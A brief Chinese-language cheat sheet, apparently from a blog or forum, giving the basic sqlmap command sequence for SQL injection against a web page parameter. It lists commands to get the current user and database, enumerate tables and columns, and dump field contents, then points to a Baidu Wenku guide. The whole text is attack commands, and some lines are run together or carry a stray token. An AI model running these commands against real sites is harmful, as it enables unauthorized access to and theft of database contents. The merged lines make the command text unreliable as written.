基本步驟:
sqlmap -u "http://url/news?id=1" --current-user #獲取當前用戶名稱
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db #獲取當前數據庫名稱sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #列表名
sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #列字段sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #獲取字段內容
日常操作中差不多就這些,需要獲取更多信息,可以在百度文庫搜“sqlmap使用手記”